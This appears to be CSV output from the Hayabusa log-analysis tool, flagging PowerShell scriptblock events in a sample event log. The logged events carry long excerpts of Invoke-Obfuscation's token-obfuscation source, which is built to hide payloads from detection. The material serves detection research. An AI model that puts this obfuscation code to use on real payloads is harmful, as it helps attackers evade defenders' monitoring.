+09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
# See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedTokenCommand { <# .SYNOPSIS Master function that orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedTokenCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER TokenTypeToObfuscate (Optional) Specifies the token type to obfuscate ('Command', 'CommandArgument', 'Comment', 'Member', 'String', 'Type', 'Variable', 'RandomWhitespace'). If not defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given TokenTypeToObfuscate. If not defined then Out-ObfuscatedTokenCommand will automatically perform obfuscation function at the highest available obfuscation level. Each token has different available obfuscation levels: 'Argument' 1-4 'Command' 1-3 'Comment' 1 'Member' 1-4 'String' 1-2 'Type' 1-2 'Variable' 1 'Whitespace' 1 'All' 1 .EXAMPLE C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' 
-ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} .( ""{0}{2}{1}"" -f'Write','t','-Hos' ) ( 'Hell' + 'o ' +'Wor'+ 'ld!' ) -ForegroundColor ( ""{1}{0}"" -f 'een','Gr') ; .( ""{1}{2}{0}""-f'ost','Writ','e-H' ) ( 'O' + 'bfusca'+ 't' + 'ion Rocks' + '!') -ForegroundColor ( ""{1}{0}""-f'een','Gr' ) .NOTES Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('Member', 'Command', 'CommandArgument', 'String', 'Variable', 'Type', 'RandomWhitespace', 'Comment')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [String] $TokenTypeToObfuscate, [Parameter(Position = 2)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = 10 # Default to highest obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. 
If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # If $TokenTypeToObfuscate was not defined then we will automate randomly calling all available obfuscation functions in Out-ObfuscatedTokenCommand. If($TokenTypeToObfuscate.Length -eq 0) { # All available obfuscation token types (minus 'String') currently supported in Out-ObfuscatedTokenCommand. # 'Comment' and 'String' will be manually added first and second respectively for reasons defined below. # 'RandomWhitespace' will be manually added last for reasons defined below. $ObfuscationChoices = @() $ObfuscationChoices += 'Member' $ObfuscationChoices += 'Command' $ObfuscationChoices += 'CommandArgument' $ObfuscationChoices += 'Variable' $ObfuscationChoices += 'Type' # Create new array with 'String' plus all obfuscation types above in random order. $ObfuscationTypeOrder = @() # Run 'Comment' first since it will be the least number of tokens to iterate through, and comments may be introduced as obfuscation technique in future revisions. $ObfuscationTypeOrder += 'Comment' # Run 'String' second since otherwise we will have unnecessary command bloat since other obfuscation functions create additional strings. $ObfuscationTypeOrder += 'String' $ObfuscationTypeOrder += (Get-Random -Input $ObfuscationChoices -Count $ObfuscationChoices.Count) # Apply each randomly-ordered $ObfuscationType from above step. ForEach($ObfuscationType in $ObfuscationTypeOrder) { $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock]::Create($ScriptString)) $ObfuscationType $ObfuscationLevel } Return $ScriptString } # Parse out and obfuscate tokens (in reverse to make indexes simpler for adding in obfuscated tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) # Handle fringe case of retrieving count of all tokens used when applying random whitespace. 
$TokenCount = ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenTypeToObfuscate}).Count $TokensForInsertingWhitespace = @('Operator','GroupStart','GroupEnd','StatementSeparator') # Script-wide variable ($Script:TypeTokenScriptStringGrowth) to speed up Type token obfuscation by avoiding having to re-tokenize ScriptString for every token. # This is because we are appending variable instantiation at the beginning of each iteration of ScriptString. # Additional script-wide variable ($Script:TypeTokenVariableArray) allows each unique Type token to only be set once per command/script for efficiency and to create less items to create indicators off of. $Script:TypeTokenScriptStringGrowth = 0 $Script:TypeTokenVariableArray = @() If($TokenTypeToObfuscate -eq 'RandomWhitespace') { # If $TokenTypeToObfuscate='RandomWhitespace' then calculate $TokenCount for output by adding token count for all tokens in $TokensForInsertingWhitespace. $TokenCount = 0 ForEach($TokenForInsertingWhitespace in $TokensForInsertingWhitespace) { $TokenCount += ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenForInsertingWhitespace}).Count } } # Handle fringe case of outputting verbiage consistent with options presented in Invoke-Obfuscation. If($TokenCount -gt 0) { # To be consistent with verbiage in Invoke-Obfuscation we will print Argument/Whitespace instead of CommandArgument/RandomWhitespace. $TokenTypeToObfuscateToPrint = $TokenTypeToObfuscate If($TokenTypeToObfuscateToPrint -eq 'CommandArgument') {$TokenTypeToObfuscateToPrint = 'Argument'} If($TokenTypeToObfuscateToPrint -eq 'RandomWhitespace') {$TokenTypeToObfuscateToPrint = 'Whitespace'} If($TokenCount -gt 1) {$Plural = 's'} Else {$Plural = ''} # Output verbiage concerning which $TokenType is currently being obfuscated and how many tokens of each type are left to obfuscate. 
# This becomes more important when obfuscated large scripts where obfuscation can take several minutes due to all of the randomization steps. Write-Host ""`n[*] Obfuscating $($TokenCount)"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" token$Plural."" } # Variables for outputting status of token processing for large token counts when obfuscating large scripts. $Counter = $TokenCount $OutputCount = 0 $IterationsToOutputOn = 100 $DifferenceForEvenOutput = $TokenCount % $IterationsToOutputOn For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Extra output for large scripts with several thousands tokens (like Invoke-Mimikatz). If(($TokenCount -gt $IterationsToOutputOn*2) -AND ((($TokenCount-$Counter)-($OutputCount*$IterationsToOutputOn)) -eq ($IterationsToOutputOn+$DifferenceForEvenOutput))) { $OutputCount++ $ExtraWhitespace = ' '*(([String]($TokenCount)).Length-([String]$Counter).Length) If($Counter -gt 0) { Write-Host ""[*] $ExtraWhitespace$Counter"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" tokens remaining to obfuscate."" } } $ObfuscatedToken = """" If(($Token.Type -eq 'String') -AND ($TokenTypeToObfuscate.ToLower() -eq 'string')) { $Counter-- # If String $Token immediately follows a period (and does not begin $ScriptString) then do not obfuscate as a String. # In this scenario $Token is originally a Member token that has quotes added to it. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If(($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) { Continue } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. 
If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Binding Validation Attributes cannot have their string values formatted with the -f format operator unless treated as a scriptblock. # When we find strings following these Parameter Binding Validation Attributes then if we are using a -f format operator we will treat the result as a scriptblock. # Source: https://technet.microsoft.com/en-us/library/hh847743.aspx $ParameterValidationAttributesToTreatStringAsScriptblock = @() $ParameterValidationAttributesToTreatStringAsScriptblock += 'alias' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allownull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptystring' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptycollection' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatecount' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatelength' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatepattern' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validaterange' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatescript' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validateset' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnullorempty' $ParameterValidationAttributesToTreatStringAsScriptblock += 'helpmessage' $ParameterValidationAttributesToTreatStringAsScriptblock += 'confirmimpact' $ParameterValidationAttributesToTreatStringAsScriptblock += 'outputtype' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel 
value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Member') -AND ($TokenTypeToObfuscate.ToLower() -eq 'member')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Attributes cannot be obfuscated like other Member Tokens, so we will only randomize the case of these tokens. # Source 1: https://technet.microsoft.com/en-us/library/hh847743.aspx $MemberTokensToOnlyRandomCase = @() $MemberTokensToOnlyRandomCase += 'mandatory' $MemberTokensToOnlyRandomCase += 'position' $MemberTokensToOnlyRandomCase += 'parametersetname' $MemberTokensToOnlyRandomCase += 'valuefrompipeline' $MemberTokensToOnlyRandomCase += 'valuefrompipelinebypropertyname' $MemberTokensToOnlyRandomCase += 'valuefromremainingarguments' $MemberTokensToOnlyRandomCase += 'helpmessage' $MemberTokensToOnlyRandomCase += 'alias' # Source 2: https://technet.microsoft.com/en-us/library/hh847872.aspx $MemberTokensToOnlyRandomCase += 'confirmimpact' $MemberTokensToOnlyRandomCase += 'defaultparametersetname' $MemberTokensToOnlyRandomCase += 'helpuri' $MemberTokensToOnlyRandomCase += 'supportspaging' $MemberTokensToOnlyRandomCase += 'supportsshouldprocess' $MemberTokensToOnlyRandomCase += 'positionalbinding' $MemberTokensToOnlyRandomCase += 'ignorecase' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1} 4 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2} default 
{Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'CommandArgument') -AND ($TokenTypeToObfuscate.ToLower() -eq 'commandargument')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} 4 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell 
Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"} ElseIf(($Token.Type -eq 'Command') -AND ($TokenTypeToObfuscate.ToLower() -eq 'command')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # If a variable is encapsulated in curly braces (e.g. ${ExecutionContext}) then the string inside is treated as a Command token. # So we will force tick obfuscation (option 1) instead of splatting (option 2) as that would cause errors. If(($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '{') -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '}')) { $ObfuscationLevel = 1 } Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} 3 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Variable') -AND ($TokenTypeToObfuscate.ToLower() -eq 'variable')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. 
If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Type') -AND ($TokenTypeToObfuscate.ToLower() -eq 'type')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Type value substrings are part of Types that cannot be direct Type casted, so we will not perform direct Type casting on Types containing these values. $TypesThatCannotByDirectTypeCasted = @() $TypesThatCannotByDirectTypeCasted += 'directoryservices.accountmanagement.' $TypesThatCannotByDirectTypeCasted += 'windows.clipboard' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($TokensForInsertingWhitespace -Contains $Token.Type) -AND ($TokenTypeToObfuscate.ToLower() -eq 'randomwhitespace')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. 
If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Comment') -AND ($TokenTypeToObfuscate.ToLower() -eq 'comment')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RemoveComments $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } } Return $ScriptString } Function Out-ObfuscatedStringTokenLevel1 { <# .SYNOPSIS Obfuscates string token by randomly concatenating the string in-line. Invoke-Obfuscation Function: Out-ObfuscatedStringTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringTokenLevel1 obfuscates a given string token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. 
For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the String token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host ('Hello'+' W'+'orl'+'d!') -ForegroundColor Green; Write-Host ('Obfuscation R'+'oc'+'k'+'s'+'!') -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host (""{2}{3}{0}{1}"" -f 'Wo','rld!','Hel','lo ') -ForegroundColor Green; Write-Host (""{4}{0}{3}{2}{1}""-f 'bfusca','cks!','Ro','tion ','O') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'String' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $EncapsulateAsScriptBlockInsteadOfParentheses = $FALSE # Extract substring to look for parameter binding values to check against $ParameterValidationAttributesToTreatStringAsScriptblock set in the beginning of this script. $SubStringLength = 25 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Replace(' ','').Replace(""`t"",'').Replace(""`n"",'') $SubStringLength = 5 If($SubString.Length -lt $SubStringLength) { $SubStringLength = $SubString.Length } $SubString = $SubString.SubString($SubString.Length-$SubStringLength,$SubStringLength) # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. If(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND ($SubString.Contains('(') -OR $SubString.Contains(',')) -AND $ScriptString.SubString(0,$Token.Start).Contains('[') -AND $ScriptString.SubString(0,$Token.Start).Contains('(')) { # Gather substring preceding the current String token to see if we need to treat the obfuscated string as a scriptblock. 
$ParameterBindingName = $ScriptString.SubString(0,$Token.Start) $ParameterBindingName = $ParameterBindingName.SubString(0,$ParameterBindingName.LastIndexOf('(')) $ParameterBindingName = $ParameterBindingName.SubString($ParameterBindingName.LastIndexOf('[')+1).Trim() # Filter out values that are not Parameter Binding due to contain whitespace, some special characters, etc. If(!$ParameterBindingName.Contains(' ') -AND !$ParameterBindingName.Contains('.') -AND !$ParameterBindingName.Contains(']') -AND !($ParameterBindingName.Length -eq 0)) { # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($ParameterValidationAttributesToTreatStringAsScriptblock -Contains $ParameterBindingName.ToLower()) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } ElseIf(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND $ScriptString.SubString($Token.Start-5,5).Contains('=')) { # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. ForEach($Parameter in $ParameterValidationAttributesToTreatStringAsScriptblock) { $SubStringLength = $Parameter.Length # Add 10 more to $SubStringLength in case there is excess whitespace between the = sign. $SubStringLength += 10 # Shorten substring length in case there is not enough room depending on the location of the token in the $ScriptString. If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring to compare against $EncapsulateAsScriptBlockInsteadOfParentheses. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength+1).Trim() # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($SubString -Match ""$Parameter.*="") { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } # Do nothing if the token has length <= 1 (e.g. 
Write-Host """", single-character tokens, etc.). If($Token.Content.Length -le 1) {Return $ScriptString} # Do nothing if the token has length <= 3 and $ObfuscationLevel is 2 (reordering). If(($Token.Content.Length -le 3) -AND $ObfuscationLevel -eq 2) {Return $ScriptString} # Do nothing if $Token.Content already contains a { or } to avoid parsing errors when { and } are introduced into substrings. If($Token.Content.Contains('{') -OR $Token.Content.Contains('}')) {Return $ScriptString} # If the Token is 'invoke' then do nothing. This is because .invoke() is treated as a member but .""invoke""() is treated as a string. If($Token.Content.ToLower() -eq 'invoke') {Return $ScriptString} # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # Tokenizer removes ticks from strings, but we want to keep them. So we will replace the contents of $Token.Content with the manually extracted token data from the original $ScriptString. $TokenContent = $ScriptString.SubString($Token.Start+1,$Token.Length-2) # If a variable is present in a string, more work needs to be done to extract from string. Warning maybe should be thrown either way. # Must come back and address this after vacation. # Variable can be displaying or setting: ""setting var like $($var='secret') and now displaying $var"" # For now just split on whitespace instead of passing to Out-Concatenated If($TokenContent.Contains('$') -OR $TokenContent.Contains('`')) { $ObfuscatedToken = '' $Counter = 0 # If special use case is met then don't substring the current Token to avoid errors. # The special cases involve a double-quoted string containing a variable or a string-embedded-command that contains whitespace in it. # E.g. 
""string ${var name with whitespace} string"" or ""string $(gci *whitespace_in_command*) string"" $TokenContentSplit = $TokenContent.Split(' ') $ContainsVariableSpecialCases = (($TokenContent.Contains('$(') -OR $TokenContent.Contains('${')) -AND ($ScriptString[$Token.Start] -eq '""')) If($ContainsVariableSpecialCases) { $TokenContentSplit = $TokenContent } ForEach($SubToken in $TokenContentSplit) { $Counter++ $ObfuscatedSubToken = $SubToken # Determine if use case of variable inside of double quotes is present as this will be handled differently below. $SpecialCaseContainsVariableInDoubleQuotes = (($ObfuscatedSubToken.Contains('$') -OR $ObfuscatedSubToken.Contains('`')) -AND ($ScriptString[$Token.Start] -eq '""')) # Since splitting on whitespace removes legitimate whitespace we need to add back whitespace for all but the final subtoken. If($Counter -lt $TokenContent.Split(' ').Count) { $ObfuscatedSubToken = $ObfuscatedSubToken + ' ' } # Concatenate $SubToken if it's long enough to be concatenated. If(($ObfuscatedSubToken.Length -gt 1) -AND !($SpecialCaseContainsVariableInDoubleQuotes)) { # Concatenate each $SubToken via Out-StringDelimitedAndConcatenated so it will handle any replacements for special characters. # Define -PassThru flag so an invocation is not added to $ObfuscatedSubToken. $ObfuscatedSubToken = Out-StringDelimitedAndConcatenated $ObfuscatedSubToken -PassThru # Evenly trim leading/trailing parentheses. 
While($ObfuscatedSubToken.StartsWith('(') -AND $ObfuscatedSubToken.EndsWith(')')) { $ObfuscatedSubToken = ($ObfuscatedSubToken.SubString(1,$ObfuscatedSubToken.Length-2)).Trim() } } Else { If($SpecialCaseContainsVariableInDoubleQuotes) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } ElseIf($ObfuscatedSubToken.Contains(""'"") -OR $ObfuscatedSubToken.Contains('$')) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } Else { $ObfuscatedSubToken = ""'"" + $ObfuscatedSubToken + ""'"" } } # Add obfuscated/trimmed $SubToken back to $ObfuscatedToken if a Replace operati",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"} ElseIf(($Token.Type -eq 'Command') -AND ($TokenTypeToObfuscate.ToLower() -eq 'command')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # If a variable is encapsulated in curly braces (e.g. ${ExecutionContext}) then the string inside is treated as a Command token. # So we will force tick obfuscation (option 1) instead of splatting (option 2) as that would cause errors. 
If(($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '{') -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '}')) { $ObfuscationLevel = 1 } Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} 3 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Variable') -AND ($TokenTypeToObfuscate.ToLower() -eq 'variable')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedVariableTokenLevel1 